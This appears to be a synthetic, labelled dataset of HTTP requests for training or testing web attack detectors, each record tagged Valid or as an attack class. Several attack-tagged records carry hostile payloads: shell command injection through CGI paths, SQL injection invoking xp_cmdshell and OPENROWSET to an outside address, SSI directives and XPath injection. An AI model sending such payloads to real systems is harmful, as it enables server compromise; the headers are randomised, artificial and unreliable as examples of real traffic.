Accept-Charset: x-mac-icelandic, iso-2022-kr;q=0.1, x-mac-japanese;q=0.6, x-mac-turkish
Accept-Encoding: gzip, compress;q=0.7, compress;q=0.3, identity;q=0.5
Accept-Language: *
Cache-Control: wdh7hema='emgiex'
Client-ip: 63.118.153.135
Cookie: 2i8zwget@u_=32469374;meR2untedtssc=7841
Cookie2: $Version="89"
Date: Thu, 11 May 06 01:08:21 GMT
ETag: W/"gxM-KAWB7.0f.MAhdFV"
Expect: 100-continue
From: utgowu@dmbui.org
If-Modified-Since: Thu, 04 Nov 04 24:14:44 UTC
If-Unmodified-Since: Sat, 12 Jan 08 23:00:13 GMT
If-Match: *
If-None-Match: "Zimx3-zZ7.BK_Otv"
If-Range: "8ZvR9iJ6Msb25zM"
Max-Forwards: 5
MIME-Version: 1.4
Pragma: qsme=Sja
Proxy-Authorization: Digest username="priNoo8"
Authorization: Digest qop=auth-int
Range: -633614,846-,145-
Referer: http://www.oawih.ch/tooth/lstetnKe/ya1u08rd.wmn
TE: gzip;q=0.0,gzip
Trailer: Host
User-Agent: tsnuonsanmhmeL
UA-CPU: StrongARM
UA-Disp: 678,816,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4560x959
Via: iij/9.4 www.sirx.htm, HTTP/0.0 www.Bmnb.js, FTP/1.5 www.recsi.jpg
Transfer-Encoding: identity
Upgrade: lha/0.0, onynn/5.1, e0f2s5/9.2, leAc/8.0
Warning: 725 www.hdse.js "umrhh5ybso" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 562281573568029685
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24620
Start - Id: 10781
class: Valid
GET /5s81Wyqd/roEtirhlleTdshya0rtt/ametaL_bVdECQdocumentqautoexec5i/lnkdf/pE/aea0ercnglNeauctssn/tCJTf7@O/a6hhe.7ON27NpV/sqaP61R5ZST4/wqdt/osE0NN-/a_3wnVG_.ItU.js?PgEA5VTc=%3Eavbscriptandhdubetweenchildsl%3Ba&.CujRZNboot.ini=m8QQgA&ooe9uh9asr=srvd&pe=tn4&_script6h5=goihbzt%7Eautoexecjg%27+rbs%3E&priari52eaeeiO=iheuge&T0ennOR4irN9tof=n6Qr%7E-+%3Edcei&lrtrkfrubm9sMi=42817078&l9otzec=eJKLDQ&s4ahy=wSlzZ&ksnaIehE5oy=obs HTTP/1.1
Host: 226.155.164.213
Connection: close
Accept: video/*;q=0.1, image/jpeg;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=00913
Client-ip: 228.70.131.109
Cookie: re5a67D=50975;halhnriiw=2628812;rdphbdVDaSinl=oKafI
Cookie2: $Version="49"
Date: Sun, 10 Aug 08 23:43:58 UTC
ETag: W/"t4Q7Bac8MqCUJ-D"
Expect: 100-continue
From: Ionmrq@m5vte.org
If-Modified-Since: Tue, 01 Aug 06 17:26:44 UTC
If-Unmodified-Since: Sun, 12 Apr 09 05:04:02 GMT
If-Match: *
If-None-Match: "5n38zsqLHs-enQmT"
If-Range: Sun, 16 Aug 09 09:10:14 CET
Max-Forwards: 97
MIME-Version: 2.2
Pragma: 5ottnpr=nnsta
Proxy-Authorization: Basic ZG5lMWU6c2VlcGNvbGM=
Authorization: tfh1c si1o4wGk=iunRy2l7
Range: 49686-192
Referer: http://www.Ohar.net/jnzntte/shgnd.sh
TE: trailers,gzip
Trailer: Host
User-Agent: Mozilla/4.0 (Machintosh; U; Mac OS X 7.8; 7e-rw; rv:9.7.2) Gecko/41988733
UA-CPU: StrongARM
UA-Disp: 4468,6865,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5959x647
Via: 4.4 www.rqmyts.html
Transfer-Encoding: deflate
Upgrade: tup/2.0, iesn/6.5
Warning: 338 www.myshle.html "dsnoeliE" "Sat, 04 Jun 05 21:44:38 CET"
X-Forwarded-For: 64.18.140.176
X-Serial-Number: 0778249732666
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10781
Start - Id: 43960
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: 67.199.177.182
Connection: keep-alive
Accept: image/*, text/plain
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: toy5Ere=rexEt1
Client-ip: 212.166.230.53
Cookie: e5Tan3dt4tAh=88228;sE28uUMH=2858544684
Cookie2: $Version="588"
Date: Sun, 02 Nov 08 01:15:14 GMT
ETag: W/"g.zs56ap96bucj4wI"
Expect: naaaaho=iektd;i12sv
From: axenii@lMdner.de
If-Modified-Since: Wed, 06 Jun 07 12:18:26 UTC
If-Unmodified-Since: Tue, 26 Sep 06 03:10:26 UTC
If-Match: *
If-None-Match: "4Ib8nR.KnYokT6Z@pfKr"
If-Range: "dzhC3Cwg9zXg7.eJNA"
Max-Forwards: 7324
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: Digest opaque="ntlogo"
Range: 97793-3,500796-0
Referer: http://httoeoat.it/csmvnh/tr4cfo/leeW/fe9tI/nrE1.sh
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/8.6 (Windows; U; Win 9x 4.2; fu-e7; rv:5.9.3) Gecko/96056284
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4200x926
Via: 3.0 39.235.101.204, 8.9 68.204.108.232, HTTP/6.2 145.167.90.217
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 43960
Start - Id: 14617
class: Valid
GET /tXWOE7hJGvT/KvarYDyHa/yaenivxKe/ckau/otaiathFee/kUBZvbud5VIdtmp/soy/74rgYt419yubttr/nme9leGRYuARuSsL8Kg.asp?2zlike.HOKyDj=i40s8%29y&roedlbhnwtP9Dci=ruEo&ehiagtnasw=utrtax&OFwindow.open_eCwc=75753&tww=c9LyzvZ%40&Ldglocation1-=bLpjljvtt&oceiesggdmo=iarSlt9&oiibPtorhzSa=e7&nkhLdn=5&Qmd=i%3DOLmr%7C%2Fhs%3ASuhMo HTTP/1.0
Host: www.1ses.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: da9d-3aysltod;q=0.4, itprbo-p;q=0.8, L-hpl, U-imYabtif;q=0.1
Cache-Control: no-store
Client-ip: 238.75.53.47
Cookie: Ie0copy=81719999
Cookie2: $Version="4"
Date: Sat, 24 Apr 04 21:22:17 UTC
ETag: W/"jmDxRyZXA3VL@cVA"
Expect: 100-continue
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Sun, 22 Jun 08 08:06:23 GMT
If-Unmodified-Since: Sun, 23 Oct 05 08:25:30 GMT
If-Match: *
If-None-Match: "L0lDLo_9JmoiKv-jV"
If-Range: *
Max-Forwards: 665
MIME-Version: 0.1
Pragma: RnadnO=o8ge
Proxy-Authorization: Basic QWVlOGFzRTpENm9lb3p0
Authorization: 2u4i o1fLrr=eaabca
Range: 1300-923,-76,037830-31
Referer: http://osr5py.st/xees/tfnc.swf
TE: gzip
Trailer: Authorization
User-Agent: Mozilla/1.6 (Machintosh; U; PPC Mac OS X 0.2; aI-rm; rv:9.5.5) Gecko/02403514
UA-CPU: PowerPC
UA-Disp: 1652,237,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 093x0174
Via: 3.0 121.46.100.43, 6.4 94.235.57.250:05, FTP/9.4 218.133.241.150
Transfer-Encoding: deflate
Upgrade: o2g/6.9
Warning: 443 103.24.228.17 "ectotaen" "Thu, 12 Apr 07 16:19:50 GMT"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 28910349808
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14617
Start - Id: 41852
class: SqlInjection
GET /sh/r1/e9MEHEzPCzpN3.YvH/eUq02/lod4_m863oF_GrMtMEE/iv.NQiUNTJORo/szAstee/hWXdPBDH./gQBuf/m1Sform.shtml?Mtmpd1v=%3B+select++*+++++from+++OPENROWSET%28+++%27SQLoledb%27%2C%27uid%3DHlenseas%3Bpwd%3DcnztaA%3BNetwork%3DDBMSSOCN%3BAddress%3D159.5.136.244%2C62986%3B%27%2C%27select+++++*+++from+++++2satr0g%27++%29&fe=entoacagyi5ldcee&htTnooKsmitY8=p%3Ebhttp9r6jt3%25u9a1hi&Dayh383tt8qmF=ks7location2%3BiS%24%40body%25asjx7e&hgsbyn2jnF=m2Ab&nn1nptduut=oc.gDejv&nbsr0gbnE=1414577&wPeiMl=3328&esein=NcatmrmdcReS&ekqXenhelgwCaO=e%3Aw8aMdasafmpzhsc&f9sWpimgkincludenaHq=winnt+4r&@yr27uuV6execJ=ifhoeleir9uclshTt&ts8ielor7qmdmtE=0VkLeTwAKyXs&gttehtafit=ora HTTP/1.1
Host: www.2Hsaf.de:28
Connection: mersaw
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 78.57.136.131
Cookie: hptiaveubdirt=oMsVnF;iwent2=~eab i)k&et0aaih;oaoCinAaoT=sgroup by2mt;iCaxr4nevale;ttnhsi=048
Cookie2: $Version="7"
Date: Wed, 20 May 09 14:18:48 CET
ETag: "a2V9IycN6MWKRF29Nv"
Expect: 100-continue
From: dupNd@t1Lces4e.com
If-Modified-Since: Fri, 10 Jun 05 17:32:58 UTC
If-Unmodified-Since: Mon, 01 Sep 08 01:35:42 CET
If-Match: "l-GQLSH_WHdBbLiKgFA"
If-None-Match: *
If-Range: Thu, 18 May 06 24:27:09 CET
Max-Forwards: 664
MIME-Version: 1.6
Pragma: wftSdxh=saeirif
Proxy-Authorization: xnD4ee qpwiaF=eesD
Authorization: NTLM bnNpZXRJb3Nzd29lb3dhZHNlaGZNT0FpYWFNbm5jYkx0ZG5ydGV6MHN5cGM=
Range: -521,-331719
Referer: /nidcer/peetqi41/lalrat.asmx
TE: gzip;q=0.5,trailers
Trailer: Expect
User-Agent: ysWtWoa9e (hQOgp3.L; roAsu7b; r3E3S4W; nNsrtf@_n; 860N6Ja9)
UA-CPU: PowerPC
UA-Disp: 7520,1896,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5914x483
Via: FTP/8.6 75.221.6.220, FTP/2.7 180.144.40.176
Transfer-Encoding: compress
Upgrade: rz8alu/5.3, a4rs/2.4, FoE/2.5, 2hiDn0/2.7
Warning: 658 www.ease.shtml "qhnna" 
X-Forwarded-For: 207.107.185.169
X-Serial-Number: 10397953831192510
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41852
Start - Id: 41078
class: SqlInjection
GET /w-Udi/9@/r0/htiqivIfcdnqe5Ad/fpGNu/uOKV5cfOJbawQ3xRNNq/eo/oc9Qe/eFHRzFa_jmGZ/iwr/sj77Nrs1OaGXPiyJ.css?dlplj3rsunv2ntw=saheuj&FLqf_1J1=ndsceNjyArnrie&iDoKaI=lefieotnk&uedagxTth=%26dzhtdde6&8qeoptmt=%3Fm&sai=%27%3BEXECmaster.dbo.xp_cmdshell%27cmd.exe&ihneSp36byvntt=978204 HTTP/1.1
Host: www.767pkube.ch
Connection: oZogdcot
Accept: text/*, audio/*;q=0.3
Accept-Charset: x-mac-icelandic;q=0.4, iso-8859-6
Accept-Encoding: 
Accept-Language: rocoMihd-8T, a3mgN-kyi, ejSv-ktrri;q=0.0, 01jr-cyo1;q=0.7
Cache-Control: max-stale=3404
Client-ip: 183.139.157.162
Cookie: i8i=nnsoror$%document]hB;2tt5=uf8I;@C8Q=mrl.NzzK;9D4positionpEU=dTGtK_;a6h=2080;53betweenunullqIwindow.open=4698369279
Cookie2: $Version="82"
Date: Fri, 30 Nov 07 06:51:40 GMT
ETag: "6r-fYwsYHOv4rS21"
Expect: aejsit=lchna;scmx
From: ttytsmgz@lbtfnlH.de
If-Modified-Since: Mon, 29 Nov 04 23:14:53 GMT
If-Unmodified-Since: Mon, 16 Jan 06 13:54:23 UTC
If-Match: *
If-None-Match: "Kp2pS1G@tfT7YH6"
If-Range: Mon, 28 Apr 08 11:28:12 UTC
Max-Forwards: 2419
MIME-Version: 9.5
Pragma: aAhy='lthsed'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Basic ZWVkbkg6dnNyYTliZDc=
Range: 253-,679517-254
Referer: http://twe91b.net/leier/CheDrh/zamd3/7neTei5/elcg.asmx
TE: trailers,chunked;q=0.1
Trailer: From
User-Agent: tedtbslssDcee0nhdr
UA-CPU: Sparc
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 194x0684
Via: hdDi/1.9 www.32ztm39u.jpg:13328, 9.3 44.84.62.7, ewl/1.6 218.202.17.43
Transfer-Encoding: identity
Upgrade: Nb5/4.4, 2oss/0.9, ienmha/5.2, paie/0.1, sMat/4.9
Warning: 604 www.hKNbdI.gif "crapaattI" "Thu, 10 Jun 04 12:26:14 UTC"
X-Forwarded-For: 110.167.165.101
X-Serial-Number: 54708069609443708
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41078
Start - Id: 39408
class: SSI
GET /vYFb/itpwwpiup0n4aqi.html?9sp@0jkrSo=23571&h4cs8tyhq54=loeeacGiegnIh&ahtxltendo9no=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&pcyay=3957486&8elaoa=e%25ltxhd%29q&aCrhuot=oecXdcinesdr3&tknttR=attljonsbeu9&kyxDenwafarun=chThkcoe&oocan1lUegde=n2Jp.JD2YwCg&HO5TqaZr.usr=uMng HTTP/1.1
Host: www.ah5dmtn.it
Connection: qr0shp
Accept: video/*;q=0.5, text/xml
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: heoe-IYscr1;q=0.3, s2letiz-rbnad;q=0.2, ducdjain-57zao
Cache-Control: only-if-cached
Client-ip: 69.95.255.231
Cookie: rTlaej38esreowC=klD;i3OrragooS1tatI=eg;Nhnni=et6arDe3eoNeyEyha;yEs3s4AttsYo2=834509993;snuciau=utbqidN
Cookie2: $Version="22"
Date: Tue, 13 Jan 09 09:45:05 UTC
ETag: "IbnKc4-D37dlywxLI"
Expect: aqPeaTo=rdtq0
If-Modified-Since: Mon, 03 May 04 20:04:20 GMT
If-Unmodified-Since: Mon, 24 Nov 08 05:51:45 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM cmVIZXluZm5vaXJ0ZWVtcDFoMXdudjJpbHd5Ym1pdHQ=
Authorization: Basic dDVsZWVlaFM6YmFhQXk4bVc=
Range: 747370-38132,5734-
Referer: /qnrqr/lnlenan.swf
TE: trailers,trailers,chunked;q=0.6
Trailer: Via
User-Agent: aBkEi9 http://www.aiu39.com
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-Color: color8
Via: 8.3 41.95.196.72, 3.7 www.9rna.css
Transfer-Encoding: eeEnce
X-Serial-Number: 3653526354532
----: ---------------------------------

null

End - Id: 39408
Start - Id: 6813
class: Valid
POST /_24qJM@A/eeo9geedrist/6ULaI/eg6uCbg9KKoTPLapJmb/Ih/l@YsIJvZkc58.tiff? HTTP/1.1
Content-Length: 218
Content-Language: 73zal5o2
Content-Encoding: deflate
Content-Location: http://www.pfa4eteo.st/ltcs/niytn/oGii11.conf
Content-MD5: aW93MmpuYzk2Z3llZWhlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Feb 08 03:50:37 CET
Last-Modified: Sat, 20 Sep 08 11:07:45 CET
Host: www.rbve.it
Connection: keep-alive
Accept: audio/*;q=0.3, image/gif;q=0.0
Accept-Charset: windows-1251, windows-1250, windows-1251;q=0.4, utf-8, euc-cn
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-stale=9443
Client-ip: 117.227.125.202
Cookie: ud1ea=0644870;lIyedtftml=mczvT2avjnnhttps;2r3kds3snOuicn=964;rdeo3eeUarn9nhe=2246667;tublrk==er%1
Cookie2: $Version="777"
Date: Thu, 19 Oct 06 22:55:50 UTC
ETag: W/"GN_EIFmqL4CemeE"
Expect: ode2tbm
From: n7hf@Nessscta.com
If-Modified-Since: Thu, 27 Jan 05 15:03:34 CET
If-Unmodified-Since: Tue, 27 Mar 07 21:21:05 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8530
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic U2VlcHNzdFg6aXJkdG9z
Authorization: NTLM bGRhZXVvbnRna2Vib2hOcTk5d2ZydG9sbmlsdHd0b2xsZGplaXRoaVI=
Range: 75-484,-76,208013-709
Referer: http://ieoRls.st/az09.htm
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: Mozilla/1.8 (compatible; Konqueror/1.0; Win98; s3feFee; n9hisBsIi)
UA-CPU: 68000
UA-Disp: 408,046,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 728x570
Via: 7.2 109.64.163.8:06586, 2.2 www.saeWrol.jpeg, HTTP/5.6 www.yEij.jpg:01
Transfer-Encoding: compress
Upgrade: oje/5.1
Warning: 797 59.247.222.32 "dfucaar" 
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 89698
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

sis5Imltteen=eEN1pWYD&g3QJP=Epeaufservicesoexeci|enhomehttpssbwps&ieu=889049&nnc9ssteehbt=72&toysNluuql2=80&ArepoeierNIeiC=59&rckurErrmnraba=km'ne agts5alls9s4o40h&lmttdaet=favNitEghAua4ei6uc&embn.MKkQNC=sz7f05l8gu

End - Id: 6813
Start - Id: 6858
class: Valid
POST /emUdirMfnat.html? HTTP/1.1
Content-Length: 90
Content-Language: ii1q
Content-Encoding: deflate
Content-Location: http://umxi.de/oSh3l0/taac.mdb
Content-MD5: b3R0NDhOVWVsd29lc0d0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Jan 05 16:45:46 CET
Last-Modified: Thu, 14 Oct 04 20:37:17 UTC
Host: www.lrvbvisb.net
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 193.120.93.85
Cookie: eno54htz=20399;e72daer=smLUuJ;4e1ohl=tVU3;qscsqnao=hs;aah4r=z0n~Trmsd
Cookie2: $Version="0"
Date: Sat, 03 Feb 07 08:02:24 UTC
ETag: W/"3ornXv3KLvP8WaN6MCLS"
Expect: 100-continue
From: 1m1ll@ibidpns.org
If-Modified-Since: Sun, 14 Sep 08 03:13:24 CET
If-Unmodified-Since: Fri, 21 Sep 07 11:05:14 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Oct 06 08:02:21 CET
Max-Forwards: 019
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: toqui lugFEd=nlopswi
Authorization: Basic YWhhZXI2OmFvaGg=
Range: -846354,921-70
Referer: /iHnd/erdi8i.tiff
TE: trailers,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.0 (compatible; Konqueror/3.8; Open BSD i586; ecasSnyaa; ooempoi)
UA-CPU: Sparc
UA-Disp: 1729,430,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6239x610
Via: 4.0 www.oo9jwsu.jpg
Transfer-Encoding: compress
Upgrade: wJoe/9.4, csik/4.7, njsNtm/6.0
Warning: 129 www.9lvodtr.jpeg "nTtwlNvsm" "Wed, 13 Dec 06 13:48:45 UTC"
X-Forwarded-For: 225.78.188.108
X-Serial-Number: 363755814823651
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

d9ntdttar=400909755&iriT6osbmdl=qRedlHry&1ansiiroavyes=etnEqoiwMkteu38o&ltf=eu]supdateek

End - Id: 6858
Start - Id: 5623
class: Valid
PUT /t7rG/ilotribghtydeoswe/wmlbreeahe5/as1iriCgeihbst0nhezs/iaatYatE/QcIpBksDheZ/etci.swf? HTTP/1.1
Content-Length: 304
Content-Language: nuaAv,ot,afstTgst
Content-Encoding: gzip
Content-Location: /rrmdw/iihhrt/utl97a3u/vsEo.swf
Content-MD5: c3NsTmx1bGRidGVpaGVqZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Jan 05 09:09:30 CET
Last-Modified: Thu, 24 Jan 08 20:25:24 CET
Host: 82.11.218.245
Connection: close
Accept: text/xml;q=0.6, text/html;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.2, gzip;q=0.7, gzip;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 236.196.163.25
Cookie: Ieegi=vo;potenjL1oeiit=538
Cookie2: $Version="2"
Date: Mon, 28 Jan 08 05:29:02 CET
ETag: W/"ciw4JlqQjA6fIxmD-"
Expect: idqica2
From: frbac@ngi0nanafk.biz
If-Modified-Since: Tue, 15 Jul 08 22:38:21 UTC
If-Unmodified-Since: Sat, 12 Jan 08 17:25:06 GMT
If-Match: "AmFCQ_9DMi07m1-4"
If-None-Match: *
If-Range: Fri, 23 Jan 04 19:08:12 UTC
Max-Forwards: 701
MIME-Version: 9.8
Pragma: Wr9pah='hms'
Proxy-Authorization: NTLM aWVmZWpnYWlnbW9kZXJlZE55YTJmRVQ5ZVRFc2VlaHRhZXk=
Authorization: Basic aWR5Y29SbDpzMXRsaW1s
Range: 67795-,06619-,662301-47622
Referer: http://ohaO.cz/Th9o/ey7Rz/ePve/5toGtta.avi
TE: gzip
Trailer: If-Modified-Since
User-Agent: euhrtvTt8/4.3
UA-CPU: x86
UA-Disp: 6817,0716,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 768x653
Via: cu7ae/6.2 www.e4l0.jpeg, FTP/7.8 202.231.227.2, HTTP/0.7 www.sced.gif
Transfer-Encoding: deflate
Upgrade: itsx/1.1, sjNs/5.5, rsIR/6.3, teTe/2.5
Warning: 865 www.holxn.css "aoehbntNeGcpervi4" 
X-Forwarded-For: 253.42.32.113
X-Serial-Number: 382947508350489867
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

0acmdp59VwHRmX=fmautoexecz8luloqeyOJh&metc2eQqrcn5=Naconnectt&soeRe5taamrsaxr=eT&e0shxlnaezab=0y&eqot1snribl=hbZs&4lorI=a7's&TMvbscriptB=isByD&ofnuisc=Yeeac5pm&23suefasbibpS=shOwisrHw&lscs=4209927&9B4z=jisitlEcae5qHr&ths0o1stnebn=do bzedl&qxyenNoaoetXs=nexecebj&s8ei8ori=hiensnvnc\(as&gb=Klinkxenat

End - Id: 5623
Start - Id: 42236
class: SqlInjection
GET /rQzBwFfnS6yw60/i-8rd2s-3gqp11q/moenS/wov/Ouq1insert/elm6nnrbg3trtanfnlrE.jpg?iyuzaiee=%3E%3Baaccess_logmoar&sock_stream3aOHS=havingk&nodEdusrh3uzEhe=hwanseom&7hsn=e8ioty2hrtgtwui&aa8iob8eldsAs=n&oawe9aRuwarUy5=aIigaoy&ecuwoxpANsneohe=865&eeIpifcssepml=51766&afrstntnhinaN=%27++++OR+++++%278Fta%27+++%3D++++%27tc%27%2B%27MElw1%27&nnzr2hEoe=49&biusau=etaae8&0Te=6hJBw7tt HTTP/1.1
Host: www.letsdes.st
Connection: close
Accept: */*;q=0.1
Accept-Charset: gb2312, iso-8859-6;q=0.4, x-mac-hebrew;q=0.7, euc-kr;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 104.162.121.20
Cookie: fra1oeos= 0etud l3ut ;DfHe1dCMjR=9;he2egNaefe=IrJe xvet-iems9
Cookie2: $Version="26"
Date: Thu, 13 Nov 08 10:53:48 UTC
ETag: W/"eMANBE.F.NeHzZc_-C"
Expect: 100-continue
From: AhkTtd8@hidg5ir.de
If-Modified-Since: Fri, 09 Jan 04 05:55:08 CET
If-Unmodified-Since: Thu, 24 Dec 09 21:00:55 CET
If-Match: *
If-None-Match: *
If-Range: "@yFZ7F5V3tU1@R1N"
Max-Forwards: 727
MIME-Version: 1.3
Pragma: tlgh='7seaeit9'
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: Basic dWRIamk6aGxhZHdh
Range: 4539-14148,-19,934-
Referer: /xaiN/sgnhc3/ersie29n/Vfl6iw.gif
TE: deflate;q=0.7,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.4 (X11; U; Unix 7.0; en-82; rv:0.2.4) Gecko/31456053
UA-CPU: x86
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 108x2342
Via: ifq/2.2 244.43.112.187:87, FTP/3.2 254.184.83.166, 2lD/7.7 www.Nmkh9t.png:24
Transfer-Encoding: identity
Upgrade: iunoNg/9.6
Warning: 805 www.oCYoru.jpg "crToo" "Wed, 13 Feb 08 17:50:20 GMT"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 5569851248014
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42236
Start - Id: 49821
class: XPathInjection
GET /iuaD-Dt_ahla2/oxZndNITlX/t1mZG1MNRsaf69/fier/aME6dSv054r/tQsnA/uxaaa5/paNT7SDLo..EZux/dpeptotnoFree83erAEs/tifiALao5sxn/ey1D/eK8Rlb7k2R.exe?raem=olr%27%5D++++%7C++++P+%7C+%2F%2Fuser%5B++name%2Ftext%28%29++++%3D+%27hEo&fssm=6kdTO-vBz5i HTTP/1.1
Host: www.mupltoj1sl.it:80
Connection: ie7gwm
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 146.50.160.76
Cookie: tieneslhdpf=ee9E6AUbeac;oasn=wesein;1eLetiea=3li
Cookie2: $Version="4"
Date: Sun, 19 Sep 04 21:48:18 CET
ETag: "zy_qieYB8jV9UgdeU3V"
Expect: 100-continue
From: noamdhg@Dea3h8.biz
If-Modified-Since: Tue, 01 Feb 05 04:39:17 UTC
If-Unmodified-Since: Sat, 18 Dec 04 11:43:13 GMT
If-Match: "61Me-zYyR-KuTQyv_"
If-None-Match: *
If-Range: Sun, 18 Jan 09 01:51:47 CET
Max-Forwards: 52
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic ZVJhcnJsQTppc3Blbw==
Authorization: tieT iapre=tartt
Range: 929-812,-37,2-
Referer: /lbmAhye.jpeg
TE: trailers
Trailer: Pragma
User-Agent: nvpxNufvVb http://www.5EayvSso.net
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: HTTP/7.0 www.hoeodieh.js
Transfer-Encoding: compress
Upgrade: no5e/1.8, lcc/5.5, gqm/0.6, trke/8.4
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 233.168.85.19
X-Serial-Number: 684744620
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49821
Start - Id: 44498
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: 176.185.174.90
Connection: fwhn
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ltgie-dnqxweee, hbt-etnoEl
Cache-Control: only-if-cached
Client-ip: 224.120.218.101
Cookie: 3zmse=NL)6tiihsh
Cookie2: $Version="20"
Date: Mon, 04 Dec 06 17:25:36 GMT
ETag: "IUVO4qgAnfRz99rZqxh"
Expect: 100-continue
From: fo6stv@wTex.net
If-Modified-Since: Tue, 13 Apr 10 19:58:13 GMT
If-Unmodified-Since: Tue, 07 Jul 09 10:23:58 CET
If-Match: "9lW@w5zMZ30TdCu5zXcB"
If-None-Match: *
If-Range: *
Max-Forwards: 6087
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM Z2VpdXJ0b2FubGVFNG95ZWhvZmVwckZkdDF0d2ltcW5kZGRobnRrT2hl
Authorization: NTLM c2hhdTB0b3RpY29rdHBUMmVlVHI1bWhnaW93ZGxvZWVmcnM=
Range: -80,3-,-9028
Referer: /co1rcmrs/tsAta5.php
TE: trailers
Trailer: Via
User-Agent: Mozilla/3.7 (X11; U; Solaris 8.3; eZ-lg; rv:5.7.7) Gecko/60409055
UA-CPU: Sparc
UA-Disp: 715,347,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 949x9593
Via: FTP/4.0 2.248.65.229:8462
Transfer-Encoding: deflate
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44498
Start - Id: 6840
class: Valid
